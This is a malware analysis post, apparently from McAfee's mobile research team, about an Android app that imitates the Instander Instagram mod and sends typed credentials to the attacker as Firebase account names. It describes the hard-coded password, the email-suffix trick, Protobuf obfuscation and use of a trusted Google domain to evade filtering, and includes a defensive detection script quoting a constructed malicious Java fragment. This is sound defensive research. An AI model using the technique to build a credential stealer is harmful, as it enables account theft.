Instagram credentials Stealer: Disguised as Mod App


Authored by Dexter Shin 

McAfee's Mobile Research Team recently introduced a new Android malware targeting Instagram users who want to increase the followers or likes on their latest post. While researching that threat further, we found another malware type that uses different technical methods to steal users' credentials. Its targets are users who are not satisfied with the default features Instagram provides. Various Instagram modification ("mod") applications already exist on the Internet for these users. The new malware we found pretends to be a popular mod app and steals Instagram credentials.

Behavior analysis

Instander is one of the well-known Instagram modification applications available for Android devices, giving Instagram users access to extra features. The mod app supports uploading high-quality images and downloading posted photos and videos.

The initial screens of this malware and Instander are similar, as shown below.

Figure 1. Instander official app (left) and malware (right)

Next, this malware requests an account (username or email) and a password. Finally, it displays an error message regardless of whether the login information is correct.

Figure 2. Malware requests account and password

The malware steals the user's username and password in a very unusual way. The main trick is to use the Firebase API. First, the user's input value is combined with l@gmail.com. This value and a static password (=kamalw20051) are then sent via the Firebase API createUserWithEmailAndPassword. The password is handled in the same way. So, after receiving the user's account and password input, this malware makes the request twice: once for the account and once for the password.

Figure 3. Main method of using the Firebase API

Since we cannot see the malware author's dashboard, we tested the same API ourselves. As a result, we confirmed that the user's input value appears in plain text on the dashboard.

Figure 4. Firebase dashboard built for testing

According to the Firebase documentation, the createUserWithEmailAndPassword API creates a new user account associated with the specified email address and password. Because the first parameter must match an email pattern, the malware author uses the code above to turn any user input value into an email pattern.

It is an API for creating accounts in Firebase, so the administrator can see the account name in the Firebase dashboard. The victim's account and password are submitted as Firebase account names, so they are visible there as plain text, without hashing or masking.
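As an added example (not code from the original article or from McAfee), the following Python heuristic scans decompiled Java source for createUserWithEmailAndPassword calls whose arguments match the pattern described above: an email built by appending a fixed mail domain to user input, or a hard-coded password literal. Both source fragments are constructed for illustration.

```python
import re

# Constructed decompiled-Java fragment modelled on the behaviour described
# above: user input concatenated with a fixed mail-domain suffix, and a
# hard-coded password, passed to createUserWithEmailAndPassword.
SUSPICIOUS_SOURCE = """
String user = editText.getText().toString();
mAuth.createUserWithEmailAndPassword(user + "l@gmail.com", "kamalw20051")
    .addOnCompleteListener(this, listener);
"""

# Constructed benign fragment: a normal sign-up form passing the email and
# password the user actually typed.
BENIGN_SOURCE = """
String email = emailField.getText().toString();
String pw = passwordField.getText().toString();
mAuth.createUserWithEmailAndPassword(email, pw)
    .addOnCompleteListener(this, listener);
"""

# Capture the two arguments of each createUserWithEmailAndPassword(...) call.
CALL_RE = re.compile(
    r"createUserWithEmailAndPassword\s*\(\s*(?P<email>[^,]+?)\s*,\s*(?P<pw>[^)]+?)\s*\)"
)
# Email argument that appends a literal "...@domain" to something else.
FIXED_DOMAIN_RE = re.compile(r'\+\s*"[^"]*@[^"]+"')
# Password argument that is nothing but a string literal.
STRING_LITERAL_RE = re.compile(r'^"[^"]*"$')

def find_credential_sink_abuse(source: str) -> list[dict]:
    """Return one finding per call whose arguments look like credential
    exfiltration rather than a genuine sign-up."""
    findings = []
    for m in CALL_RE.finditer(source):
        email_arg = m.group("email").strip()
        pw_arg = m.group("pw").strip()
        reasons = []
        if FIXED_DOMAIN_RE.search(email_arg):
            reasons.append("email argument built by appending a fixed mail domain")
        if STRING_LITERAL_RE.match(pw_arg):
            reasons.append("password argument is a hard-coded literal")
        if reasons:
            findings.append({"email_arg": email_arg, "password_arg": pw_arg,
                             "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in find_credential_sink_abuse(SUSPICIOUS_SOURCE):
        print(f)
```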

Network traffic

An interesting point about this malware's network traffic is that it communicates with the Firebase server in Protobuf format. The default configuration of this Firebase API uses the JSON format. Although Protobuf is still readable enough, it can be assumed that the malware author deliberately tried to obfuscate the network traffic through these additional settings. Also, the domain used for the data transfer (=www.googleapis.com) is managed by Google. Because it is such a common and trusted domain, many network filtering and firewall solutions do not flag this traffic.

Conclusion

As mentioned, users should always be careful when installing third-party apps. Beyond the types of malware we have introduced so far, attackers try to steal users' credentials in a variety of ways. Therefore, you should use security software on your mobile devices and always keep them up to date.

Fortunately, McAfee Mobile Security is able to detect this as Android/InstaStealer and protect you from similar threats. For more information, visit McAfee Mobile Security.

Indicators of Compromise 

SHA256: 

  • 238a040fc53ba1f27c77943be88167d23ed502495fd83f501004356efdc22a39